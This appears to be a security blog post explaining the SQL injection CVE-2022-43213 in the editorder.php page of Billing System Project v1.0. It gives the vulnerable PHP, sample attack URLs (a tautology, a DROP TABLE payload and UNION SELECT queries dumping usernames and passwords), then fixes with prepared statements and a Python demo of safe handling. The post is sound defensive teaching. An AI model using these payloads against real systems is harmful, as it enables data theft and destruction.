In the world of web security, SQL injection vulnerabilities remain one of the most common and dangerous threats. One such vulnerability, tracked as CVE-2022-43213, affects the open-source Billing System Project v1.0. Discovered in late 2022, this weakness allows attackers to execute malicious SQL commands through improper handling of user input, specifically via the id parameter on the editorder.php page.
This post will break down everything you need to know about CVE-2022-43213: how it works, how it can be exploited, and how to fix it, using simple language and clear code examples.
What is CVE-2022-43213?
CVE-2022-43213 is an SQL injection vulnerability discovered in the editorder.php file of Billing System Project version 1.0. The application takes an input parameter called id from the URL and uses it in an SQL query without proper sanitization or parameterization.
What does this mean?
If an attacker is able to control the id value, they can change the SQL query to do almost anything they want—like dumping data, deleting tables, or even gaining administrator access.
Where is the Vulnerability?
Location:
/editorder.php?id=<value>
The problem is that the code takes $_GET['id'] and puts it directly into a database query.
Here's a simplified version of what the relevant PHP code might look like:
```php
<?php
include('db.php');
$id = $_GET['id']; // Gets the 'id' value from the URL, no validation!
// BAD! The raw user input is spliced straight into the SQL text, so the
// database parses whatever the user supplied as part of the statement.
$query = "SELECT * FROM orders WHERE id = $id";
$result = mysqli_query($con, $query);
?>
```
In this code, the value of $id comes directly from user input with no filtering. That means an attacker can modify the query by adding SQL code into the id parameter.
Attacker visits:
http://example.com/editorder.php?id=1
Attacker tries:
http://example.com/editorder.php?id=1 OR 1=1
More dangerous payload:
http://example.com/editorder.php?id=1; DROP TABLE users;--
Extracting usernames and passwords (if such columns exist):
http://example.com/editorder.php?id=1 UNION SELECT username, password, null, null FROM users-- -
This appends rows from the users table to the query result, so usernames and passwords appear wherever the page displays order data.
Example: Dumping all users
Suppose you want to reveal contents from the users table.
http://example.com/editorder.php?id=-1 UNION SELECT 1, username, password FROM users-- -
*This URL will make the script combine data from the users table with the orders table, possibly exposing sensitive information on the page.*
References
- NVD Entry for CVE-2022-43213
- Exploit-DB: 51010
- Original Vendor Source Code
How to Fix It
1. *Always Use Prepared Statements!*
Update database queries to use parameterized queries, so that user input is bound as a value and never spliced into the SQL text.
Fixed Code Example
```php
<?php
include('db.php');
$id = $_GET['id'];
// The SQL text contains only a placeholder; the value is sent separately,
// so whatever the user supplies can never be parsed as SQL.
$stmt = $con->prepare("SELECT * FROM orders WHERE id = ?");
if ($stmt === false) {
    die('Failed to prepare statement');
}
$stmt->bind_param('i', $id); // 'i' means integer: the value is sent as an int
$stmt->execute();
$result = $stmt->get_result();
?>
```
2. *Validate the Input Type:*
Ensure the id is always an integer before it reaches the query, for example by casting it:
```php
$id = intval($_GET['id']);
```
3. *Limit Database Privileges:*
Ensure the web app user cannot DROP tables or access system databases.
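To see why fixes 1 and 2 work, the following added example (not code from the Billing System Project or from the original post) runs the same id value through three handlers against an in-memory SQLite database: one that interpolates the id into the SQL text like the flawed editorder.php, one that binds it as a parameter like the fixed code, and one that validates the type first and then binds it. The orders table, its column names and the sample rows are constructed for the demo and are not the project's real schema; SQLite stands in for MySQL because the mechanism is the same.

```python
import re
import sqlite3

# Constructed sample rows standing in for the billing system's orders table.
# The column names are an assumption for this demo, not the project's real schema.
ORDERS = [
    (1, "alice", 19.99),
    (2, "bob", 250.00),
    (3, "carol", 7.50),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database seeded with the sample orders."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (id INTEGER, customer TEXT, total REAL)")
    con.executemany("INSERT INTO orders VALUES (?, ?, ?)", ORDERS)
    return con


def vulnerable_lookup(con: sqlite3.Connection, user_id: str) -> list:
    """Mirror the flawed editorder.php: the raw id is pasted into the SQL text,
    so anything the user supplies is parsed as part of the query."""
    query = f"SELECT * FROM orders WHERE id = {user_id}"
    return con.execute(query).fetchall()


def parameterized_lookup(con: sqlite3.Connection, user_id) -> list:
    """Mirror fix 1: the id is bound as a parameter and is only ever compared
    as a value, never interpreted as SQL."""
    return con.execute("SELECT * FROM orders WHERE id = ?", (user_id,)).fetchall()


def is_valid_id(user_id: str) -> bool:
    """Fix 2: accept only a plain ASCII decimal integer (no spaces, no operators)."""
    return re.fullmatch(r"[0-9]+", user_id) is not None


def safe_lookup(con: sqlite3.Connection, user_id: str) -> list:
    """Fixes 1 and 2 together: validate the type first, then bind the parameter."""
    if not is_valid_id(user_id):
        raise ValueError("id must be an integer")
    return parameterized_lookup(con, int(user_id))


def compare(user_id: str) -> dict:
    """Run one input through all three handlers and report the row counts,
    or 'rejected' when validation refuses the input."""
    con = make_db()
    try:
        validated = len(safe_lookup(con, user_id))
    except ValueError:
        validated = "rejected"
    return {
        "vulnerable": len(vulnerable_lookup(con, user_id)),
        "parameterized": len(parameterized_lookup(con, user_id)),
        "validated": validated,
    }


if __name__ == "__main__":
    # A legitimate request returns exactly one order from every handler.
    print("id=1        ->", compare("1"))
    # The post's tautology payload: the interpolated query leaks every order,
    # the bound parameter matches no row because '1 OR 1=1' is not an id,
    # and the validating handler rejects the input before any query runs.
    print("id=1 OR 1=1 ->", compare("1 OR 1=1"))
```

The parameterized handler returns zero rows for the payload because the database compares the whole string against the integer column rather than parsing it; the validating handler fails earlier and louder, which is why the two fixes belong together.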
Conclusion
CVE-2022-43213 is a serious security flaw in the Billing System Project v1.0. If left unpatched, it can give attackers full control over your data. Luckily, fixing it is simple: always use prepared statements and never trust user input directly!
If you use this billing system, make sure you update your code immediately.
Want more details?
Check out the NVD entry or exploit database for technical references and proof-of-concept exploits.
Timeline
Published on: 11/23/2022 03:15:00 UTC
Last modified on: 11/28/2022 19:44:00 UTC